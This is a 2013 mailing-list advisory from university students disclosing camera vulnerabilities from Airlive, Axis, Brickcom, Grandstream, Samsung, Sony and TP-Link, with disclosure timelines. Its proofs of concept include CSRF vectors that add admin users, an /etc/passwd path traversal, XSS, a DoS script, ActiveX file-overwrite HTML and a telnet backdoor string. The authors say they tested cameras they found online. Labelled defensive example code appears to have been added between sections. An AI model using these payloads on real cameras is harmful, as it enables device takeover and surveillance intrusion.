[Full-disclosure] Security Analysis of IP video surveillance cameras
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Security Analysis of IP video surveillance cameras
- From: Javier Repiso Sánchez <javier.repiso@xxxxxxxxxxx>
- Date: Wed, 12 Jun 2013 10:19:16 +0200
Dear sirs,
We are a group of students from the European University of Madrid who have
carried out a security analysis of IP video surveillance cameras as the final
project of the Security and Information Technology Master.
In total, we analyzed 9 different camera brands and found 14 vulnerabilities.
These vulnerabilities are of all kinds: simple ones, such as XSS or CSRF, and
very harmful and dangerous ones, such as privilege escalation or authentication
bypass.
Note that all the analysis we have done has been on cameras found through
Google dorks and Shodan, so we did not need to purchase any of them for our
tests. Everything we needed was online.
In conclusion, we can say that the vast majority of security cameras are not
ready to be connected to an open network where everyone can access them.
We proceed to describe all the previously reported vulnerabilities, ordered by
brand:
===========================================================================
AIRLIVE
====================================================================
===========================================================================
1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in these devices:
-CVE-2013-3540. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)
-CVE-2013-3541. Relative Path Traversal (CWE-23)
-CVE-2013-3686. Information Exposure (CWE-200) and Permissions, Privileges and
Access Controls (CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information (CWE-312)
-CVE-2013-3691. Denial of Service
3.Affected Products
CVE-2013-3541, CVE-2013-3686: the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687: the following products are affected: POE2600HD,
POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It's possible other models are affected, but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540: CSRF via GET method. Targeted attack against any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a specially crafted CSRF
vector. This allows the web interface parameters to be manipulated.
In the following example we build a vector that creates an additional user
with administrator credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________
4.2.Relative Path Traversal
CVE-2013-3541: path traversal that allows you to read the file system
configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________
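The control whose absence the traversal above demonstrates is a containment check on the file-path parameter before the CGI opens anything. The following is an added example, not code from the advisory or from the vendor: it keeps a user-supplied path inside a fixed base directory by canonicalising the joined path and testing its prefix, rather than searching for the substring "..". The base directory /srv/camera-www is an assumption; the probe values are the advisory's.

```python
# Added example (not code from the advisory): keeping a user-supplied file path
# inside a fixed base directory, the check that a fileread-style CGI
# (Airlive CVE-2013-3541) needs before opening READ.filePath.
# The base directory name is an assumption; the probe paths are the advisory's.
import os


class PathTraversalError(ValueError):
    """Raised when the requested path would leave the allowed base directory."""


def resolve_under_base(base_dir: str, requested: str) -> str:
    """Return the absolute path for `requested` if it stays inside `base_dir`.

    The candidate is built first and canonicalised (realpath collapses '..',
    duplicate slashes and symlinks), and only then compared with the base.
    A substring search for '..' would miss absolute paths and symlinks;
    a prefix test on the canonical path does not.
    """
    if not requested or "\x00" in requested:
        raise PathTraversalError("empty path or NUL byte in path")
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` when `requested` is absolute, which is
    # exactly what we want: '/etc/passwd' must then fail the prefix test.
    candidate = os.path.realpath(os.path.join(base, requested))
    if not candidate.startswith(base + os.sep):
        raise PathTraversalError(f"path escapes base directory: {requested!r}")
    return candidate


def handle_fileread(base_dir: str, file_path_param: str) -> str:
    """Decide how the CGI should answer a READ.filePath value.

    Only the decision is modelled (no file is opened), so the example runs
    without a web server or real files.
    """
    try:
        path = resolve_under_base(base_dir, file_path_param)
    except PathTraversalError:
        return "403 Forbidden"
    relative = os.path.relpath(path, os.path.realpath(base_dir))
    return f"200 OK (would read {relative})"


if __name__ == "__main__":
    for probe in ("config/general.conf", "../../../../etc/passwd", "/etc/passwd"):
        print(f"{probe!r:32} -> {handle_fileread('/srv/camera-www', probe)}")
```

Percent-decoding of the query string is assumed to have happened before this check, as a CGI framework does; the decoded value is what gets canonicalised.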
4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686: exposure of sensitive data by requesting the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
The admin password is returned base64-encoded and can be decoded.
Now we can log in again as the admin user, completing the privilege escalation.
4.4.Clear Text Storage of Sensitive Information
CVE-2013-3687: all the sensitive information about the device is stored in
plain text inside the backup file.
It can be opened with any text editor to look for user information, for
example passwords, user names and so on.
4.5.Denial of Service (DoS)
CVE-2013-3691: DoS by overflowing the path '/'. A request with a large number
of 'a' characters can take down the HTTP service of the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the message "Connection has been reset". After removing the added
characters and refreshing, you will get the message "Can't Connect".
It will be down for around 2 min, but if the request is repeated, for example
once every minute, the camera never recovers.
The following Python script could be used to test the DoS:
_____________________________________________________________________________
import socket

cam_ip = 'xx.xx.xx.xx'  # address of the camera under test

request = 'GET /' + 'A' * 3000 + '.html HTTP/1.0\r\n'
s = socket.socket()
s.connect((cam_ip, 80))
s.send(request.encode())
response = s.recv(1024)
s.close()
_____________________________________________________________________________
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez
and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3540, CVE-2013-3686 and CVE-2013-3687 were discovered by Jonás Ropero
Castillo.
6.Report Timeline
-2013-05-31: Student team notifies Airlive Customer Support of the
vulnerabilities. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-05: Airlive team passes the report to technical support to analyze
the vulnerabilities.
========================================================================
AXIS
====================================================================
========================================================================
1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
A vulnerability has been found in these devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method (CWE-618)
3.Affected Products
CVE-2013-3543: all camera devices using AXIS Media Control (AMC) are affected.
The vulnerability affects the latest version of the software (6.2.10.11,
released on October 19, 2012).
4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
On the vendor web site, you can read that “AXIS Media Control is the
recommended method for viewing video images in Microsoft Internet Explorer.”
The vulnerability can be exploited by a remote malicious person to overwrite
arbitrary files with garbage data on a vulnerable system.
It exists because the ActiveX control exposes the insecure
"StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in the
"AxisMediaControlEmb.dll" DLL.
This can be exploited to corrupt or create arbitrary files in the context of
the current user.
In the following example we corrupt regedit.exe using one of the vulnerable
ActiveX methods.
When we click on one of the buttons, we can see that regedit.exe is
overwritten with garbage.
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
<head>
<title></title>
<script language="javaScript" type="text/javascript">
function startRecord(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
MyActiveX.StartRecord(theFile);
}
function saveCurrentImage(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
var theFormat = 1;
MyActiveX.SaveCurrentImage(theFormat, theFile);
}
function startRecordMedia(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
var theFlags = 1;
var theMediaTypes = "default"
MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
}
</script>
</head>
<body>
<object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}"
style="width:640;height:480">
<param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
<param name="MediaType" value="mjpeg">
<param name="Volume" value="1">
<param name="ShowStatusBar" value="1">
<param name="ShowToolbar" value="1">
<param name="AutoStart" value="1">
<param name="UIMode" value="ptz-relative">
<param name="MediaType" value="mjpeg-unicast">
<param name="StretchToFit" value="0">
<param name="PTZControlURL" value="http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi">
</object>
<br>
<INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
<INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
<INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
</body>
</html>
_____________________________________________________________________________
5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.
6.Report Timeline
-2013-05-24: Student team notifies Axis Customer Support of the
vulnerability.
-2013-05-24: Axis team asks for a report with technical information.
-2013-05-26: Technical details sent to Axis.
-2013-05-27: Axis team passes the report to technical support to analyze the
vulnerability.
============================================================================
BRICKCOM
====================================================================
============================================================================
1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in this device:
-CVE-2013-3689. Authentication Bypass Issues (CWE-592) and Clear Text Storage of
Sensitive Information (CWE-312)
-CVE-2013-3690. Cross Site Request Forgery (CWE-352), Permissions, Privileges,
and Access Control (CWE-264) and Execution with Unnecessary Privileges (CWE-250)
3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It's possible other models are affected, but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmware versions:
firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the following firmware versions you need to be logged in as administrator to
download the file, but the information is still in plain text:
firmwareVersion=v3.1.0.8, v3.1.0.4
-CVE-2013-3690.
All firmware versions checked are affected.
4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689: this allows you to download the whole device configuration
file by requesting the following URL (all data shown is in plain text). No
authentication is necessary.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________
The most interesting parameters could be:
UserSetSetting.userList.users[n].password= ***
UserSetSetting.userList.users[n].name= ***
4.2.Cross Site Request Forgery (CSRF) + Privilege Escalation
CVE-2013-3690: CSRF is possible via POST method.
A privilege escalation from a viewer user to an administrator user is also
possible.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a specially crafted CSRF
vector. This allows the web interface parameters to be manipulated.
The following request can exploit this vulnerability:
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"
method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez
and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Student team notifies Brickcom Customer Support of the
vulnerabilities.
-2013-05-31: Brickcom answers agreeing with some of the vulnerabilities, but
there are some they think are not correct.
(CVE-2013-3689, authentication bypass and plain text information: after
talking with the vendor, it looks like the bypass is fixed from firmware
3.1.x.x on, but the information is still shown in plain text, so they should
fix this second one.)
-2013-06-03: Students check and communicate to Brickcom the exact products and
firmware versions affected by the vulnerabilities.
-2013-06-04: The vendor agrees with everything stated and reports that it will
fix it as soon as possible.
===============================================================================
GRANDSTREAM
====================================================================
===============================================================================
1.Advisory Information
Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
The following vulnerabilities have been found in these devices:
-CVE-2013-3542. Backdoor in Telnet Protocol (CAPEC-443)
-CVE-2013-3962. Cross Site Scripting (CWE-79)
-CVE-2013-3963. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)
3.Affected Products
CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963: the following products are
affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P,
GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500.
It's possible other models are affected, but they were not checked.
4.PoC
4.1.Backdoor in Telnet Protocol
CVE-2013-3542: backdoor in Telnet protocol.
Connect via the telnet protocol to any affected camera (it's open by
default).
Then enter the magic string “ !#/ ” as both username and password.
You will get the admin panel settings menu. If you type "help", the following
commands are shown:
=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================
@@@ restore (Reset settings to factory default)
An attacker can take control of the device, which makes these devices very
vulnerable.
4.2.Cross Site Scripting (XSS)
CVE-2013-3962: non-persistent Cross Site Scripting.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________
4.3.Cross Site Request Forgery (CSRF)
CVE-2013-3963: CSRF via GET method.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a specially crafted CSRF
vector. This allows the web interface parameters to be manipulated.
Request the following URL to replicate the attack.
_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________
5.Credits
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero
Castillo.
6.Report Timeline
-2013-05-31: Students open a ticket to notify Grandstream Customer Support of
CVE-2013-3542.
-2013-05-31: Grandstream team passes the report to technical support to analyze
the vulnerability.
-2013-06-11: Students open a ticket to notify Grandstream Customer Support of
the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.
===========================================================================
SAMSUNG
====================================================================
===========================================================================
1.Advisory Information
Title: Samsung Series Vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3964. Cross Site Scripting (CWE-79)
3.Affected Products
CVE-2013-3964: the following products are affected: SHR-5162, SHR-5082
It's possible other models are affected, but they were not checked:
SHR-5XXX, SHR-516X, SHR-508X, SHR-5042, SHR-4160, SHR-4081, SHR-2XXX, SHR-216X,
SHR-208X, SHR-204X
4.PoC
4.1.Cross Site Scripting (XSS)
CVE-2013-3964: non-persistent Cross Site Scripting.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________
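The two reflected XSS findings (Grandstream CVE-2013-3962 and Samsung CVE-2013-3964) and the Airlive oversized-path DoS (CVE-2013-3691) are both failures in how the embedded HTTP server handles the request target: it is echoed into an error page unescaped, and it is accepted at any length. The following added example (not code from the advisory or from any vendor) shows a request-line handler that closes both gaps, refusing an over-long target with 414 before any routing and HTML-escaping the path before it appears in a 404 body. The 2048-byte limit and the page bodies are assumptions.

```python
# Added example (not code from the advisory): request-line handling with the two
# checks the advisory shows missing, a bound on the request-target length
# (Airlive CVE-2013-3691) and HTML-escaping of the echoed path (Grandstream
# CVE-2013-3962, Samsung CVE-2013-3964).  The limit and bodies are assumptions.
import html
from dataclasses import dataclass

MAX_TARGET_LEN = 2048  # assumed limit; Apache's LimitRequestLine defaults to 8190


@dataclass
class Response:
    status: int
    body: str


def handle_request_line(request_line: str) -> Response:
    """Parse an HTTP/1.x request line and build the response a hardened
    embedded server would return for it.

    The length check runs before the target is routed, parsed or logged, so a
    3000-byte path costs the device a comparison and a short reply instead of
    a buffer; the path is escaped before it is reflected into HTML, so markup
    in the URL is shown as text rather than executed in the viewer's browser.
    """
    parts = request_line.rstrip("\r\n").split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return Response(400, "<h1>400 Bad Request</h1>")
    method, target, _version = parts
    if len(target) > MAX_TARGET_LEN:
        return Response(414, "<h1>414 URI Too Long</h1>")
    if method not in ("GET", "HEAD"):
        return Response(405, "<h1>405 Method Not Allowed</h1>")
    if target == "/":
        return Response(200, "<h1>Camera</h1>")
    # Unknown path: echo it back only after escaping.
    return Response(404, f"<h1>404 Not Found</h1><p>{html.escape(target)}</p>")


if __name__ == "__main__":
    for line in ("GET / HTTP/1.0\r\n",
                 "GET /" + "A" * 3000 + ".html HTTP/1.0\r\n",
                 "GET /<script>alert(123)</script> HTTP/1.1\r\n"):
        r = handle_request_line(line)
        print(r.status, r.body[:80])
```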
5.Credits
-CVE-2013-3964 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-06-11: Students try to contact the Samsung Support Centre, but the service
is temporarily down.
===========================================================================
SONY
====================================================================
===========================================================================
1.Advisory Information
Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
We have found the following vulnerability in these devices:
-CVE-2013-3539. Cross Site Request Forgery (CWE-352)
3.Affected Products
CVE-2013-3539: the following products are affected: SNC CH140, SNC CH180, SNC
CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and
SNC DH280.
It's possible other models are affected, but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3539: CSRF via POST method. Targeted attack against any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a specially crafted CSRF
vector. This allows the web interface parameters to be manipulated.
This is our HTML attack page:
_____________________________________________________________________________
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi"
method="POST">
<input type="Select" name="ViewerModeDefault" value="00000fff">
<input type="Hidden" name="ViewerAuthen" value="off">
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
<input type="Hidden" name="User1" value="xxxx,c0000fff">
<input type="Hidden" name="User2" value="xxxx,c0000fff">
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
<input type="Hidden" name="User4" value="Og==,00000fff">
<input type="Hidden" name="User5" value="Og==,00000fff">
<input type="Hidden" name="User6" value="Og==,00000fff">
<input type="Hidden" name="User7" value="Og==,00000fff">
<input type="Hidden" name="User8" value="Og==,00000fff">
<input type="Hidden" name="User9" value="Og==,00000fff">
<input type="Hidden" name="Reload" value="referer">
<script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
Now we can check that we have a new user in the configuration.
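All four CSRF findings in this report, Airlive (usrgrp.cgi via GET), Brickcom (users.cgi via POST), Grandstream (usermanage via GET) and Sony (user.cgi via POST), come from user-management CGIs that accept any request carrying the victim's session cookie. The following added example (not code from the advisory or from any vendor) shows the server-side checks that stop them: state changes only on POST, the browser-set Origin/Referer must be the camera itself, and the form must carry a per-session token that a page on another origin cannot read. It reports every layer each vector trips. Endpoint paths and parameters are taken from the advisory; the session object, the csrf_token field name and the camera origin https://camera.example are assumptions.

```python
# Added example (not code from the advisory): server-side CSRF checks for the
# user-management CGIs named in the report.  Paths and parameters are the
# advisory's; the session store, token field and camera origin are assumptions.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional

CAMERA_ORIGIN = "https://camera.example"  # assumed origin the camera UI is served from


@dataclass
class Session:
    user: str
    # Random per-session token, embedded in the UI's own forms as a hidden field.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]
    params: Dict[str, str]


def csrf_violations(req: Request, session: Optional[Session]) -> List[str]:
    """Return every reason a state-changing request must be refused ([] = allowed).

    The three layers are independent; any one of them alone stops the
    advisory's vectors, and reporting all of them shows which a vector trips.
    """
    if session is None:
        return ["not authenticated"]
    problems: List[str] = []
    if req.method != "POST":
        # usrgrp.cgi?...&action=add and usermanage?cmd=add succeed on GET, so
        # a link or <img src> on any page is enough to add a user.
        problems.append("state-changing request must use POST")
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != CAMERA_ORIGIN and not origin.startswith(CAMERA_ORIGIN + "/"):
        problems.append("cross-origin request")
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        problems.append("missing or invalid CSRF token")
    return problems


def demo() -> Dict[str, List[str]]:
    """Run the advisory's four vectors and one legitimate submission through the
    checks.  All requests are constructed here for the example."""
    admin = Session(user="admin")
    bait = {"Origin": "http://attacker.example",
            "Referer": "http://attacker.example/bait.html"}
    cases = {
        "airlive_get": Request("GET", "/cgi-bin/admin/usrgrp.cgi", bait,
                               {"user": "test1", "pwd": "test1",
                                "grp": "administrator", "action": "add"}),
        "grandstream_get": Request("GET", "/goform/usermanage", bait,
                                   {"cmd": "add", "user.name": "test3",
                                    "user.password": "test3", "user.level": "0"}),
        "brickcom_post": Request("POST", "/cgi-bin/users.cgi", bait,
                                 {"action": "add", "username": "test2",
                                  "password": "test2", "privilege": "1"}),
        "sony_post": Request("POST", "/command/user.cgi", bait,
                             {"User3": "dG1wdG1wOnRtcHRtcA==,c0000fff",
                              "Reload": "referer"}),
        # Legitimate: submitted from the camera's own UI with the session token.
        "legit_post": Request("POST", "/cgi-bin/users.cgi", {"Origin": CAMERA_ORIGIN},
                              {"action": "add", "username": "operator2",
                               "csrf_token": admin.csrf_token}),
    }
    return {name: csrf_violations(req, admin) for name, req in cases.items()}


if __name__ == "__main__":
    for name, problems in demo().items():
        print(f"{name:16} {'allowed' if not problems else '; '.join(problems)}")
```

Where the firmware cannot be changed, the same effect for the POST-based vectors is obtained by marking the session cookie SameSite=Strict on a reverse proxy in front of the camera, but nothing short of a token check protects a GET endpoint that changes state.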
5.Credits
-CVE-2013-3539 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-25: Student team notifies Sony Customer Support of the
vulnerability. No reply received.
===========================================================================
TP-LINK
====================================================================
===========================================================================
1.Advisory Information
Title: TP-LINK TL-SC3171 Vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
The following vulnerability has been found in this device:
-CVE-2013-3688. Authentication Bypass Issues (CWE-592) and Execution with
Unnecessary Privileges (CWE-250).
3.Affected Products
-CVE-2013-3688. The following product is affected: TP-LINK TL-SC3171
It's possible other models are affected, but they were not checked.
4.PoC
4.1.Remote Command Execution bypassing authentication
CVE-2013-3688: remote command execution bypassing authentication.
We have found that it is possible to reboot this kind of device remotely. The
attack vectors are the following:
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/reboot
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault
_____________________________________________________________________________
With the first one you get a blank page and you can't log in again until the
device has rebooted.
With the second one you get a success message and, of course, at the next
login you must enter the factory settings.
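Several findings in this report leave a clear trace in an access log: a management CGI answering 2xx to an unauthenticated client (the reboot and hardfactorydefault endpoints here, configfile.dump on Brickcom), "../" in a file-path parameter (Airlive fileread) and a request target thousands of bytes long (the Airlive DoS). The following added example (not code from the advisory or from any vendor) runs those checks over Common Log Format lines as a reverse proxy or syslog collector in front of the cameras would record them. The endpoint paths are the advisory's; the log format, the 1024-byte threshold and every sample line are constructed for the example.

```python
# Added example (not code from the advisory): access-log checks for the request
# patterns the advisory describes.  Endpoint paths are the advisory's; the
# Common Log Format input, the threshold and the sample lines are constructed.
import re
from typing import List, Tuple
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident authuser [date] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]*\] "([^"]*)" (\d{3}) \S+$')

SENSITIVE_PATHS = {  # management endpoints named in the advisory
    "/cgi-bin/reboot", "/cgi-bin/hardfactorydefault", "/configfile.dump",
    "/cgi-bin/admin/fileread", "/cgi-bin/admin/usrgrp.cgi", "/cgi-bin/users.cgi",
    "/goform/usermanage", "/command/user.cgi",
}
MAX_TARGET_LEN = 1024  # assumed: anything longer is treated as a DoS probe


def analyse_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, finding) for every line matching one of the patterns.

    Path and query are percent-decoded before inspection so '%2e%2e/' is seen
    as '../'.  A 2xx status with authuser '-' is what makes a management call
    suspicious: the device acted without having authenticated anyone.
    """
    findings: List[Tuple[str, str]] = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue
        client, authuser, request, status = m.groups()
        parts = request.split(" ")
        if len(parts) < 2:
            continue
        target = parts[1]
        if len(target) > MAX_TARGET_LEN:
            findings.append((client, f"oversized request target ({len(target)} bytes)"))
            continue  # nothing else worth parsing in a 3000-byte path
        url = urlsplit(target)
        path, query = unquote(url.path), unquote(url.query)
        if path in SENSITIVE_PATHS and authuser == "-" and status.startswith("2"):
            findings.append((client, f"unauthenticated success on {path}"))
        if "../" in query or "/../" in path or path.endswith("/.."):
            findings.append((client, f"path traversal attempt on {path}"))
    return findings


SAMPLE_LOG = [  # constructed lines, not taken from any real device
    '192.0.2.10 - admin [12/Jun/2013:10:19:16 +0200] "GET /cgi-bin/admin/usrgrp.cgi?action=list HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jun/2013:10:20:01 +0200] "GET /cgi-bin/reboot HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Jun/2013:10:20:05 +0200] "GET /configfile.dump?action=get HTTP/1.1" 200 8192',
    '198.51.100.7 - - [12/Jun/2013:10:20:09 +0200] "GET /cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd HTTP/1.1" 403 0',
    '198.51.100.7 - - [12/Jun/2013:10:20:12 +0200] "GET /' + "a" * 3000 + ' HTTP/1.0" 400 0',
    '192.0.2.10 - admin [12/Jun/2013:10:25:00 +0200] "GET /cgi-bin/reboot HTTP/1.1" 200 0',
]


if __name__ == "__main__":
    for client, finding in analyse_log(SAMPLE_LOG):
        print(f"{client:15} {finding}")
```

The last sample line, an administrator rebooting the camera, produces no finding: the check keys on the combination of endpoint, missing authuser and success status, not on the endpoint alone.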
5.Credits
-CVE-2013-3688, was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez
and Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Student team notifies TP-Link Customer Support of the
vulnerability. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability
before and it has been corrected in a new beta firmware version.
-2013-06-04: Students answer the vendor saying that this vulnerability is
different from the Coresecurity vulnerabilities.
-2013-06-05: TP-Link answers saying this vulnerability is the same as the
vulnerability reported by Coresecurity.
-2013-06-05: Students respond by explaining the details of the vulnerability
and confirming that the vulnerability is different.
-2013-06-06: TP-Link answers confirming that the vulnerability is fixed with the
latest patch for the vulnerabilities reported by Coresecurity. The beta version
is available on the TP-Link web site.
AUTHORS
Eliezer Varadé Lopez
Javier Repiso Sánchez
Jonás Ropero Castillo
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/